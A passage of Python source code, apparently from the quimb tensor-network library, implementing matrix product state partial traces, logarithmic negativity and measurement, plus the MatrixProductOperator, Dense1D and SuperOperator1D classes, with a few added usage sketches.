kb |= T_DN
def partial_trace_compress(self, sysa, sysb, eps=1e-8,
method=('isvd', None), max_bond=(None, 1024),
leave_short=True, renorm=True,
lower_ind_id='b{}', verbosity=0,
**compress_opts):
r"""Perform a compressed partial trace using singular value
lateral then vertical decompositions of transfer matrix products::
.....sysa...... ...sysb....
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
==> form inner product
............... ...........
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
| | | | | | | | | | | | | | | | | | | | | | | | | | | | |
o-o-o-o-A-A-A-A-A-A-A-A-o-o-B-B-B-B-B-B-o-o-o-o-o-o-o-o-o
==> lateral SVD on each section
.....sysa...... ...sysb....
/\ /\ /\ /\
... ~~~E A~~~~~~~~~~~A E~E B~~~~~~~B E~~~ ...
\/ \/ \/ \/
==> vertical SVD and unfold on A & B
| |
/-------A-------\ /-----B-----\
... ~~~E E~E E~~~ ...
\-------A-------/ \-----B-----/
| |
With various special cases including OBC or end spins included in
        subsystems.
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float or (float, float), optional
Tolerance(s) to use when compressing the subsystem transfer
matrices and vertically decomposing.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
            vertically compressing subsystems.
max_bond : int or (int, int), optional
The maximum bond to keep for laterally compressing the state then
            vertically compressing subsystems.
leave_short : bool, optional
If True (the default), don't try to compress short sections.
renorm : bool, optional
            If True (the default), renormalize the state so that ``tr(rho)==1``.
lower_ind_id : str, optional
The index id to create for the new density matrix, the upper_ind_id
is automatically taken as the current site_ind_id.
compress_opts : dict, optional
If given, supplied to ``partial_trace_compress`` to govern how
singular values are treated. See ``tensor_split``.
verbosity : {0, 1}, optional
How much information to print while performing the compressed
partial trace.
Returns
-------
rho_ab : TensorNetwork
Density matrix tensor network with
            ``outer_inds = ('kA', 'kB', 'bA', 'bB')`` for example.
"""
N = self.L
if (len(sysa) + len(sysb) == N) and not self.cyclic:
return self.bipartite_schmidt_state(len(sysa), get='rho')
# parse horizontal and vertical svd tolerances and methods
try:
heps, veps = eps
except (ValueError, TypeError):
heps = veps = eps
try:
hmethod, vmethod = method
except (ValueError, TypeError):
hmethod = vmethod = method
try:
hmax_bond, vmax_bond = max_bond
except (ValueError, TypeError):
hmax_bond = vmax_bond = max_bond
# the sequence of sites in each of the 'environment' sections
envm = range(max(sysa) + 1, min(sysb))
envl = range(0, min(sysa))
envr = range(max(sysb) + 1, N)
# spread norm, and if not cyclic put in mixed canonical form, taking
# care that the orthogonality centre is in right place to use identity
k = self.copy()
k.left_canonize()
k.right_canonize(max(sysa) + (bool(envm) or bool(envr)))
# form the inner product
b = k.conj()
k.add_tag('_KET')
b.add_tag('_BRA')
kb = k | b
# label the various partitions
names = ('_ENVL', '_SYSA', '_ENVM', '_SYSB', '_ENVR')
for name, where in zip(names, (envl, sysa, envm, sysb, envr)):
if where:
kb.add_tag(name, where=map(self.site_tag, where), which='any')
if self.cyclic:
# can combine right and left envs
sections = [envm, sysa, sysb, (*envr, *envl)]
else:
sections = [envm]
# if either system includes end, can ignore and use identity
if 0 not in sysa:
sections.append(sysa)
if N - 1 not in sysb:
sections.append(sysb)
# ignore empty sections
sections = list(filter(len, sections))
# figure out the various indices
ul_ur_ll_lrs = []
for section in sections:
# ...section[i]....
# ul[i] -o-o-o-o-o-o-o-o-o- ur[i]
# | | | | | | | | |
# ll[i] -o-o-o-o-o-o-o-o-o- lr[i]
st_left = self.site_tag(section[0] - 1)
st_right = self.site_tag(section[0])
ul, = bonds(kb['_KET', st_left], kb['_KET', st_right])
ll, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
st_left = self.site_tag(section[-1])
st_right = self.site_tag(section[-1] + 1)
ur, = bonds(kb['_KET', st_left], kb['_KET', st_right])
lr, = bonds(kb['_BRA', st_left], kb['_BRA', st_right])
ul_ur_ll_lrs.append((ul, ur, ll, lr))
# lateral compress sections if long
compressed = []
for section, (ul, _, ll, _) in zip(sections, ul_ur_ll_lrs):
self._do_lateral_compress(self, kb, section, leave_short, ul, ll,
heps, hmethod, hmax_bond, verbosity,
compressed, **compress_opts)
# vertical compress and unfold system sections only
for section, (ul, ur, ll, lr) in zip(sections, ul_ur_ll_lrs):
self._do_vertical_decomp(self, kb, section, sysa, sysb, compressed,
ul, ur, ll, lr, vmethod, vmax_bond, veps,
verbosity, **compress_opts)
if not self.cyclic:
# check if either system is at end, and thus reduces to identities
#
# A-A-A-A-A-A-A-m-m-m- \-m-m-m-
# | | | | | | | | | | ... ==> | | | ...
# A-A-A-A-A-A-A-m-m-m- /-m-m-m-
#
if 0 in sysa:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_LEFT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[0])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[0])]
else:
TU = kb['_SYSB', '_UP']
TD = kb['_SYSB', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysa[-1])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysa[-1])].bonds(TD)
# delete the A system
kb.delete('_SYSA')
kb.reindex_({ubnd: "_tmp_ind_uA", lbnd: "_tmp_ind_lA"})
else:
# or else replace the left or right envs with identites since
#
# >->->->-A-A-A-A- +-A-A-A-A-
# | | | | | | | | ... ==> | | | | |
# >->->->-A-A-A-A- +-A-A-A-A-
#
kb.replace_with_identity('_ENVL', inplace=True)
if N - 1 in sysb:
# get neighbouring tensor
if envm:
try:
TU = TD = kb['_ENVM', '_RIGHT']
except KeyError:
# didn't lateral compress
TU = kb['_ENVM', '_KET', self.site_tag(envm[-1])]
TD = kb['_ENVM', '_BRA', self.site_tag(envm[-1])]
else:
TU = kb['_SYSA', '_UP']
TD = kb['_SYSA', '_DOWN']
ubnd, = kb['_KET', self.site_tag(sysb[0])].bonds(TU)
lbnd, = kb['_BRA', self.site_tag(sysb[0])].bonds(TD)
# delete the B system
kb.delete('_SYSB')
kb.reindex_({ubnd: "_tmp_ind_uB", lbnd: "_tmp_ind_lB"})
else:
kb.replace_with_identity('_ENVR', inplace=True)
kb.reindex_({
'_tmp_ind_uA': self.site_ind('A'),
'_tmp_ind_lA': lower_ind_id.format('A'),
'_tmp_ind_uB': self.site_ind('B'),
'_tmp_ind_lB': lower_ind_id.format('B'),
})
if renorm:
# normalize
norm = kb.trace(['kA', 'kB'], ['bA', 'bB'])
ts = []
tags = kb.tags
# check if we have system A
if '_SYSA' in tags:
ts.extend(kb[sysa[0]])
# check if we have system B
if '_SYSB' in tags:
ts.extend(kb[sysb[0]])
        # If we don't have either (OBC with both at ends) use middle envm
if len(ts) == 0:
ts.extend(kb[envm[0]])
nt = len(ts)
if verbosity > 0:
print(f"Renormalizing for norm {norm} among {nt} tensors.")
# now spread the norm out among tensors
for t in ts:
t.modify(data=t.data / norm**(1 / nt))
return kb
def logneg_subsys(self, sysa, sysb, compress_opts=None,
approx_spectral_opts=None, verbosity=0,
approx_thresh=2**12):
r"""Compute the logarithmic negativity between subsytem blocks, e.g.::
sysa sysb
......... .....
... -o-o-o-o-o-o-A-A-A-A-A-o-o-o-B-B-B-o-o-o-o-o-o-o- ...
| | | | | | | | | | | | | | | | | | | | | | | |
Parameters
----------
sysa : sequence of int
The sites, which should be contiguous, defining subsystem A.
sysb : sequence of int
The sites, which should be contiguous, defining subsystem B.
eps : float, optional
Tolerance to use when compressing the subsystem transfer matrices.
method : str or (str, str), optional
Method(s) to use for laterally compressing the state then
            vertically compressing subsystems.
compress_opts : dict, optional
If given, supplied to ``partial_trace_compress`` to govern how
singular values are treated. See ``tensor_split``.
approx_spectral_opts
Supplied to :func:`~quimb.approx_spectral_function`.
Returns
-------
ln : float
The logarithmic negativity.
See Also
--------
MatrixProductState.partial_trace_compress, approx_spectral_function
"""
if not self.cyclic and (len(sysa) + len(sysb) == self.L):
# pure bipartition with OBC
psi = self.bipartite_schmidt_state(len(sysa), get='ket-dense')
d = round(psi.shape[0]**0.5)
return qu.logneg(psi, [d, d])
compress_opts = ensure_dict(compress_opts)
approx_spectral_opts = ensure_dict(approx_spectral_opts)
# set the default verbosity for each method
compress_opts.setdefault('verbosity', verbosity)
approx_spectral_opts.setdefault('verbosity', verbosity)
# form the compressed density matrix representation
rho_ab = self.partial_trace_compress(sysa, sysb, **compress_opts)
# view it as an operator
rho_ab_pt_lo = rho_ab.aslinearoperator(['kA', 'bB'], ['bA', 'kB'])
if rho_ab_pt_lo.shape[0] <= approx_thresh:
tr_norm = norm_trace_dense(rho_ab_pt_lo.to_dense(), isherm=True)
else:
# estimate its spectrum and sum the abs(eigenvalues)
tr_norm = qu.approx_spectral_function(
rho_ab_pt_lo, abs, **approx_spectral_opts)
# clip below 0
return max(0, log2(tr_norm))
def measure(
self,
site,
remove=False,
outcome=None,
renorm=True,
cur_orthog=None,
get=None,
inplace=False,
):
r"""Measure this MPS at ``site``, including projecting the state.
Optionally remove the site afterwards, yielding an MPS with one less
site. In either case the orthogonality center of the returned MPS is
``min(site, new_L - 1)``.
Parameters
----------
site : int
The site to measure.
remove : bool, optional
Whether to remove the site completely after projecting the
measurement. If ``True``, sites greater than ``site`` will be
            retagged and reindexed one down, and the MPS will have one less site.
E.g::
0-1-2-3-4-5-6
/ / / - measure and remove site 3
0-1-2-4-5-6
- reindex sites (4, 5, 6) to (3, 4, 5)
0-1-2-3-4-5
outcome : None or int, optional
Specify the desired outcome of the measurement. If ``None``, it
will be randomly sampled according to the local density matrix.
renorm : bool, optional
Whether to renormalize the state post measurement.
cur_orthog : None or int, optional
If you already know the orthogonality center, you can supply it
            here for efficiency's sake.
get : {None, 'outcome'}, optional
If ``'outcome'``, simply return the outcome, and don't perform any
projection.
inplace : bool, optional
Whether to perform the measurement in place or not.
Returns
-------
outcome : int
The measurement outcome, drawn from ``range(phys_dim)``.
psi : MatrixProductState
The measured state, if ``get != 'outcome'``.
"""
if self.cyclic:
raise ValueError('Not supported on cyclic MPS yet.')
tn = self if inplace else self.copy()
L = tn.L
d = self.phys_dim(site)
# make sure MPS is canonicalized
if cur_orthog is not None:
tn.shift_orthogonality_center(cur_orthog, site)
else:
tn.canonize(site)
# local tensor and physical dim
t = tn[site]
ind = tn.site_ind(site)
# diagonal of reduced density matrix = probs
tii = t.contract(t.H, output_inds=(ind,))
p = do('real', tii.data)
if outcome is None:
# sample an outcome
outcome = do('random.choice', do('arange', d, like=p), p=p)
if get == 'outcome':
return outcome
# project the outcome and renormalize
t.isel_({ind: outcome})
if renorm:
t.modify(data=t.data / p[outcome]**0.5)
if remove:
# contract the projected tensor into neighbor
if site == L - 1:
tn ^= slice(site - 1, site + 1)
else:
tn ^= slice(site, site + 2)
# adjust structure for one less spin
for i in range(site + 1, L):
tn[i].reindex_({tn.site_ind(i): tn.site_ind(i - 1)})
tn[i].retag_({tn.site_tag(i): tn.site_tag(i - 1)})
tn._L = L - 1
else:
# simply re-expand tensor dimensions (with zeros)
t.new_ind(ind, size=d, axis=-1)
return outcome, tn
measure_ = functools.partialmethod(measure, inplace=True)
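# Sketch of a projective measurement on a basis state, where the outcome is
# deterministic; assumes ``MPS_computational_state`` from ``quimb.tensor``:
#
#     >>> psi = MPS_computational_state('0110')
#     >>> outcome, psi = psi.measure(1)
#     >>> outcome
#     1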
class MatrixProductOperator(TensorNetwork1DOperator,
TensorNetwork1DFlat,
TensorNetwork1D,
TensorNetwork):
"""Initialise a matrix product operator, with auto labelling and tagging.
Parameters
----------
arrays : sequence of arrays
The tensor arrays to form into a MPO.
shape : str, optional
        String specifying the layout of the tensors. E.g. 'lrud' (the default)
        indicates the shape corresponds to left-bond, right-bond, 'up'
        physical index, 'down' physical index. End tensors have either 'l' or
        'r' dropped from the string.
upper_ind_id : str
        A string specifying how to label the upper physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(upper_ind_id.format, range(len(arrays)))``.
lower_ind_id : str
        A string specifying how to label the lower physical site indices.
Should contain a ``'{}'`` placeholder. It is used to generate the
actual indices like: ``map(lower_ind_id.format, range(len(arrays)))``.
site_tag_id : str
        A string specifying how to tag the tensors at each site. Should
contain a ``'{}'`` placeholder. It is used to generate the actual tags
like: ``map(site_tag_id.format, range(len(arrays)))``.
tags : str or sequence of str, optional
Global tags to attach to all tensors.
bond_name : str, optional
The base name of the bond indices, onto which uuids will be added.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_upper_ind_id',
'_lower_ind_id',
'cyclic',
'_L',
)
def __init__(self, arrays, shape='lrud', site_tag_id='I{}', tags=None,
upper_ind_id='k{}', lower_ind_id='b{}', bond_name="",
**tn_opts):
# short-circuit for copying
if isinstance(arrays, MatrixProductOperator):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays)
# process site indices
self._upper_ind_id = upper_ind_id
self._lower_ind_id = lower_ind_id
upper_inds = map(upper_ind_id.format, range(self.L))
lower_inds = map(lower_ind_id.format, range(self.L))
# process site tags
self._site_tag_id = site_tag_id
site_tags = map(site_tag_id.format, range(self.L))
if tags is not None:
if isinstance(tags, str):
tags = (tags,)
else:
tags = tuple(tags)
site_tags = tuple((st,) + tags for st in site_tags)
self.cyclic = (ops.ndim(arrays[0]) == 4)
# transpose arrays to 'lrud' order.
def gen_orders():
lud_ord = tuple(shape.replace('r', "").find(x) for x in 'lud')
rud_ord = tuple(shape.replace('l', "").find(x) for x in 'rud')
lrud_ord = tuple(map(shape.find, 'lrud'))
yield rud_ord if not self.cyclic else lrud_ord
for _ in range(self.L - 2):
yield lrud_ord
yield lud_ord if not self.cyclic else lrud_ord
def gen_inds():
cyc_bond = (rand_uuid(base=bond_name),) if self.cyclic else ()
nbond = rand_uuid(base=bond_name)
yield (*cyc_bond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
for _ in range(self.L - 2):
nbond = rand_uuid(base=bond_name)
yield (pbond, nbond, next(upper_inds), next(lower_inds))
pbond = nbond
yield (pbond, *cyc_bond, next(upper_inds), next(lower_inds))
def gen_tensors():
for array, site_tag, inds, order in zip(arrays, site_tags,
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=site_tag)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def from_dense(cls, ham, dims, upper_ind_id='k{}',
lower_ind_id='b{}', site_tag_id='I{}',
**split_opts):
"""Create a ``MatrixProductOperator`` directly from a dense vector
Parameters
----------
ham : array_like
The dense operator to convert to MPO from.
dims : sequence of int
Physical subsystem dimensions of each site.
upper_ind_id : str
How to index the upper sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
lower_ind_id : str
How to index the lower sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
site_tag_id : str
How to tag the physical sites, see
:class:`~quimb.tensor.tensor_1d.MatrixProductOperator`.
split_opts
            Supplied to :func:`~quimb.tensor.tensor_core.tensor_split` in
            order to partition the dense operator into tensors.
Returns
-------
MatrixProductOperator
"""
set_default_compress_mode(split_opts)
L = len(dims)
upper_inds = [upper_ind_id.format(i) for i in range(L)]
lower_inds = [lower_ind_id.format(i) for i in range(L)]
        T = Tensor(reshape(ops.asarray(ham), dims + dims),
                   inds=upper_inds + lower_inds)
def gen_tensors():
# split
# <-- : yield
# : :
# OOOOOOO--O-O-O
# ||||||| | | |
# .......
# left_inds
TM = T
for i in range(L - 1, 0, -1):
                TM, TR = TM.split(left_inds=upper_inds[:i] + lower_inds[:i],
                                  get='tensors',
                                  rtags=site_tag_id.format(i), **split_opts)
yield TR
TM.add_tag(site_tag_id.format(0))
yield TM
tn = TensorNetwork(gen_tensors())
return cls.from_TN(tn, cyclic=False, L=L,
upper_ind_id=upper_ind_id,
lower_ind_id=lower_ind_id,
site_tag_id=site_tag_id)
def add_MPO(self, other, inplace=False, compress=False, **compress_opts):
"""Add another MatrixProductState to this one.
"""
if self.L != other.L:
raise ValueError("Can't add MPO with another of different length."
f"Got lengths {self.L} and {other.L}")
summed = self if inplace else self.copy()
for i in summed.gen_site_coos():
t1, t2 = summed[i], other[i]
if set(t1.inds) != set(t2.inds):
# Need to use bonds to match indices
reindex_map = {}
if i > 0 or self.cyclic:
pair = ((i - 1) % self.L, i)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
if i < summed.L - 1 or self.cyclic:
pair = (i, (i + 1) % self.L)
reindex_map[other.bond(*pair)] = summed.bond(*pair)
t2 = t2.reindex(reindex_map)
sum_inds = (summed.upper_ind(i), summed.lower_ind(i))
t1.direct_product_(t2, sum_inds=sum_inds)
if compress:
summed.compress(**compress_opts)
return summed
add_MPO_ = functools.partialmethod(add_MPO, inplace=True)
_apply_mps = tensor_network_apply_op_vec
def _apply_mpo(self, other, compress=False, **compress_opts):
A, B = self.copy(), other.copy()
# align the indices and combine into a ladder
A.upper_ind_id = B.upper_ind_id
B.upper_ind_id = "__tmp{}__"
A.lower_ind_id = "__tmp{}__"
AB = A | B
# contract each pair of tensors at each site
for i in range(A.L):
AB ^= A.site_tag(i)
# convert back to MPO and fuse the double bonds
AB.view_as_(
MatrixProductOperator,
upper_ind_id=A.upper_ind_id,
lower_ind_id=B.lower_ind_id,
cyclic=self.cyclic,
)
AB.fuse_multibonds_()
# optionally compress
if compress:
AB.compress(**compress_opts)
return AB
def apply(self, other, compress=False, **compress_opts):
r"""Act with this MPO on another MPO or MPS, such that the resulting
object has the same tensor network structure/indices as ``other``.
For an MPS::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x-x
-->
| | | | | | | | | | | | | | | | | | <- other.site_ind_id
out: y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y=y
For an MPO::
| | | | | | | | | | | | | | | | | |
self: A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A-A
| | | | | | | | | | | | | | | | | |
other: B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B-B
| | | | | | | | | | | | | | | | | |
-->
| | | | | | | | | | | | | | | | | | <- other.upper_ind_id
out: C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C=C
| | | | | | | | | | | | | | | | | | <- other.lower_ind_id
The resulting TN will have the same structure/indices as ``other``, but
probably with larger bonds (depending on compression).
Parameters
----------
other : MatrixProductOperator or MatrixProductState
The object to act on.
compress : bool, optional
Whether to compress the resulting object.
compress_opts
Supplied to :meth:`TensorNetwork1DFlat.compress`.
Returns
-------
MatrixProductOperator or MatrixProductState
"""
if isinstance(other, MatrixProductState):
return self._apply_mps(other, compress=compress, **compress_opts)
elif isinstance(other, MatrixProductOperator):
return self._apply_mpo(other, compress=compress, **compress_opts)
else:
raise TypeError("Can only Dot with a MatrixProductOperator or a "
f"MatrixProductState, got {type(other)}")
dot = apply
def permute_arrays(self, shape='lrud'):
"""Permute the indices of each tensor in this MPO to match ``shape``.
This doesn't change how the overall object interacts with other tensor
networks but may be useful for extracting the underlying arrays
consistently. This is an inplace operation.
Parameters
----------
shape : str, optional
A permutation of ``'lrud'`` specifying the desired order of the
left, right, upper and lower (down) indices respectively.
"""
for i in self.sites:
inds = {'u': self.upper_ind(i), 'd': self.lower_ind(i)}
if self.cyclic or i > 0:
inds['l'] = self.bond(i, (i - 1) % self.L)
if self.cyclic or i < self.L - 1:
inds['r'] = self.bond(i, (i + 1) % self.L)
inds = [inds[s] for s in shape if s in inds]
self[i].transpose_(*inds)
def trace(self, left_inds=None, right_inds=None):
"""Take the trace of this MPO.
"""
if left_inds is None:
left_inds = map(self.upper_ind, self.gen_site_coos())
if right_inds is None:
right_inds = map(self.lower_ind, self.gen_site_coos())
return super().trace(left_inds, right_inds)
def partial_transpose(self, sysa, inplace=False):
"""Perform the partial transpose on this MPO by swapping the bra and
ket indices on sites in ``sysa``.
Parameters
----------
sysa : sequence of int or int
The sites to transpose indices on.
inplace : bool, optional
Whether to perform the partial transposition inplace.
Returns
-------
MatrixProductOperator
"""
tn = self if inplace else self.copy()
if isinstance(sysa, Integral):
sysa = (sysa,)
tmp_ind_id = "__tmp_{}__"
tn.reindex_({tn.upper_ind(i): tmp_ind_id.format(i) for i in sysa})
tn.reindex_({tn.lower_ind(i): tn.upper_ind(i) for i in sysa})
tn.reindex_({tmp_ind_id.format(i): tn.lower_ind(i) for i in sysa})
return tn
def __add__(self, other):
"""MPO addition.
"""
return self.add_MPO(other, inplace=False)
def __iadd__(self, other):
"""In-place MPO addition.
"""
return self.add_MPO(other, inplace=True)
def __sub__(self, other):
"""MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=False)
def __isub__(self, other):
"""In-place MPO subtraction.
"""
return self.add_MPO(-1 * other, inplace=True)
@property
def lower_inds(self):
"""An ordered tuple of the actual lower physical indices.
"""
return tuple(map(self.lower_ind, self.gen_site_coos()))
def rand_state(self, bond_dim, **mps_opts):
"""Get a random vector matching this MPO.
"""
return qu.tensor.MPS_rand_state(
self.L, bond_dim=bond_dim,
phys_dim=[self.phys_dim(i) for i in self.sites],
dtype=self.dtype, cyclic=self.cyclic, **mps_opts
)
def identity(self, **mpo_opts):
"""Get a identity matching this MPO.
"""
return qu.tensor.MPO_identity_like(self, **mpo_opts)
def show(self, max_width=None):
l1 = ""
l2 = ""
l3 = ""
num_can_l, num_can_r = self.count_canonized()
for i in range(self.L - 1):
bdim = self.bond_size(i, i + 1)
strl = len(str(bdim))
l1 += f"│{bdim}"
l2 += (">" if i < num_can_l else
"<" if i >= self.L - num_can_r else
"●") + ("─" if bdim < 100 else "━") * strl
l3 += "│" + " " * strl
l1 += "│"
l2 += "<" if num_can_r > 0 else "●"
l3 += "│"
if self.cyclic:
bdim = self.bond_size(0, self.L - 1)
bnd_str = ("─" if bdim < 100 else "━") * strl
l1 = f" {bdim}{l1}{bdim} "
l2 = f"+{bnd_str}{l2}{bnd_str}+"
l3 = f" {' ' * strl}{l3}{' ' * strl} "
print_multi_line(l1, l2, l3, max_width=max_width)
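# Editorial usage sketch (not part of the original module). It exercises the
# ``MatrixProductOperator`` methods defined above; ``MPO_rand`` and the dense
# helper ``qu.rand_herm`` are assumed to exist in the installed quimb version
# and their exact signatures may vary.
def _demo_mpo_usage():  # pragma: no cover
    import quimb.tensor as qtn

    A = qtn.MPO_rand(10, bond_dim=4)
    B = qtn.MPO_rand(10, bond_dim=4)

    # addition dispatches to ``add_MPO`` via ``__add__``
    C = A + B
    C.show()

    # act on a random MPS: the result keeps the MPS's outer index structure
    psi = qtn.MPS_rand_state(10, bond_dim=4)
    phi = A.apply(psi)

    # build an MPO directly from a dense operator via ``from_dense``
    dense = qu.rand_herm(2 ** 6)
    H = MatrixProductOperator.from_dense(dense, dims=[2] * 6)

    return C.trace(), phi, H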
class Dense1D(TensorNetwork1DVector,
TensorNetwork1D,
TensorNetwork):
"""Mimics other 1D tensor network structures, but really just keeps the
full state in a single tensor. This allows e.g. applying gates in the same
way for quantum circuit simulation as for lazily represented Hilbert spaces.
Parameters
----------
array : array_like
The full Hilbert space vector - assumed to be made of equal Hilbert
spaces each of size ``phys_dim`` and will be reshaped as such.
phys_dim : int, optional
The Hilbert space size of each site, default: 2.
tags : sequence of str, optional
Extra tags to add to the tensor network.
site_ind_id : str, optional
String formatter describing how to label the site indices.
site_tag_id : str, optional
String formatter describing how to label the site tags.
tn_opts
Supplied to :class:`~quimb.tensor.tensor_core.TensorNetwork`.
"""
_EXTRA_PROPS = (
'_site_ind_id',
'_site_tag_id',
'_L',
)
def __init__(self, array, phys_dim=2, tags=None,
site_ind_id='k{}', site_tag_id='I{}', **tn_opts):
# copy short-circuit
if isinstance(array, Dense1D):
super().__init__(array)
return
# work out number of sites and sub-dimensions etc.
self._L = qu.infer_size(array, base=phys_dim)
dims = [phys_dim] * self.L
data = ops.asarray(array).reshape(*dims)
# process site indices
self._site_ind_id = site_ind_id
site_inds = [self.site_ind(i) for i in range(self.L)]
# process site tags
self._site_tag_id = site_tag_id
site_tags = oset(self.site_tag(i) for i in range(self.L))
if tags is not None:
# mix in global tags
site_tags = tags_to_oset(tags) | site_tags
T = Tensor(data=data, inds=site_inds, tags=site_tags)
super().__init__([T], virtual=True, **tn_opts)
@classmethod
def rand(cls, n, phys_dim=2, dtype=float, **dense1d_opts):
"""Create a random dense vector 'tensor network'.
"""
array = qu.randn(phys_dim ** n, dtype=dtype)
array /= qu.norm(array, 'fro')
return cls(array, **dense1d_opts)
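# Editorial usage sketch (not part of the original module). ``Dense1D`` keeps
# the whole state in one tensor but exposes the usual 1D-vector interface, so
# gates can be applied exactly as for an MPS; ``qu.pauli`` and the inherited
# ``gate`` method are assumed available in the installed quimb version.
def _demo_dense1d_usage():  # pragma: no cover
    dense = Dense1D.rand(4, phys_dim=2)        # 4 sites, normalized at random
    flipped = dense.gate(qu.pauli('X'), 0)     # single-site gate on site 0
    return flipped.to_dense()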
class SuperOperator1D(
TensorNetwork1D,
TensorNetwork,
):
r"""A 1D tensor network super-operator class::
0 1 2 n-1
| | | | <-- outer_upper_ind_id
O===O===O== =O
|\ |\ |\ |\ <-- inner_upper_ind_id
) ) ) ... ) <-- K (size of local Kraus sum)
|/ |/ |/ |/ <-- inner_lower_ind_id
O===O===O== =O
| | : | | <-- outer_lower_ind_id
:
chi (size of entangling bond dim)
Parameters
----------
arrays : sequence of arrays
The data arrays defining the superoperator. This should be a sequence
of 2n arrays, such that the first two correspond to the upper and lower
operators acting on site 0 etc. The arrays should be 5-dimensional
unless OBC conditions are desired, in which case the first two and last
two should be 4-dimensional. The dimension order of each array should
match the ``shape`` option.
"""
_EXTRA_PROPS = (
'_site_tag_id',
'_outer_upper_ind_id',
'_inner_upper_ind_id',
'_inner_lower_ind_id',
'_outer_lower_ind_id',
'cyclic',
'_L',
)
def __init__(
self, arrays,
shape='lrkud',
site_tag_id='I{}',
outer_upper_ind_id='kn{}',
inner_upper_ind_id='k{}',
inner_lower_ind_id='b{}',
outer_lower_ind_id='bn{}',
tags=None,
tags_upper=None,
tags_lower=None,
**tn_opts,
):
# short-circuit for copying
if isinstance(arrays, SuperOperator1D):
super().__init__(arrays)
return
arrays = tuple(arrays)
self._L = len(arrays) // 2
# process indices
self._outer_upper_ind_id = outer_upper_ind_id
self._inner_upper_ind_id = inner_upper_ind_id
self._inner_lower_ind_id = inner_lower_ind_id
self._outer_lower_ind_id = outer_lower_ind_id
outer_upper_inds = map(outer_upper_ind_id.format, self.gen_site_coos())
inner_upper_inds = map(inner_upper_ind_id.format, self.gen_site_coos())
inner_lower_inds = map(inner_lower_ind_id.format, self.gen_site_coos())
outer_lower_inds = map(outer_lower_ind_id.format, self.gen_site_coos())
# process tags
self._site_tag_id = site_tag_id
tags = tags_to_oset(tags)
tags_upper = tags_to_oset(tags_upper)
tags_lower = tags_to_oset(tags_lower)
def gen_tags():
for site_tag in self.site_tags:
yield (site_tag,) + tags + tags_upper
yield (site_tag,) + tags + tags_lower
self.cyclic = (ops.ndim(arrays[0]) == 5)
# transpose arrays to 'lrkud' order
# u
# |
# l--O--r
# |\
# d k
def gen_orders():
lkud_ord = tuple(shape.replace('r', "").find(x) for x in 'lkud')
rkud_ord = tuple(shape.replace('l', "").find(x) for x in 'rkud')
lrkud_ord = tuple(map(shape.find, 'lrkud'))
yield rkud_ord if not self.cyclic else lrkud_ord
yield rkud_ord if not self.cyclic else lrkud_ord
for _ in range(self.L - 2):
yield lrkud_ord
yield lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
yield lkud_ord if not self.cyclic else lrkud_ord
def gen_inds():
# |<- outer_upper_ind
# cycU_ix or pU_ix --O-- nU_ix
# /|<- inner_upper_ind
# k_ix ->(
# \|<- inner_lower_ind
# cycL_ix or pL_ix --O-- nL_ix
# |<- outer_lower_ind
if self.cyclic:
cycU_ix, cycL_ix = (rand_uuid(),), (rand_uuid(),)
else:
cycU_ix, cycL_ix = (), ()
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (*cycU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (*cycL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
for _ in range(self.L - 2):
nU_ix, nL_ix, k_ix = rand_uuid(), rand_uuid(), rand_uuid()
yield (pU_ix, nU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, nL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
pU_ix, pL_ix = nU_ix, nL_ix
k_ix = rand_uuid()
yield (pU_ix, *cycU_ix, k_ix,
next(outer_upper_inds), next(inner_upper_inds))
yield (pL_ix, *cycL_ix, k_ix,
next(outer_lower_inds), next(inner_lower_inds))
def gen_tensors():
for array, tags, inds, order in zip(arrays, gen_tags(),
gen_inds(), gen_orders()):
yield Tensor(transpose(array, order), inds=inds, tags=tags)
super().__init__(gen_tensors(), virtual=True, **tn_opts)
@classmethod
def rand(cls, n, K, chi, phys_dim=2, herm=True,
cyclic=False, dtype=complex, **superop_opts):
def gen_arrays():
for i in range(n):
shape = []
if cyclic or (i != 0):
shape += [chi]
if cyclic or (i != n - 1):
shape += [chi]
shape += [K, phys_dim, phys_dim]
data = qu.randn(shape=shape, dtype=dtype)
yield data
if herm:
yield data.conj()
else:
yield qu.randn(shape=shape, dtype=dtype)
arrays = map(ops.sensibly_scale, gen_arrays())
return cls(arrays, **superop_opts)
@property
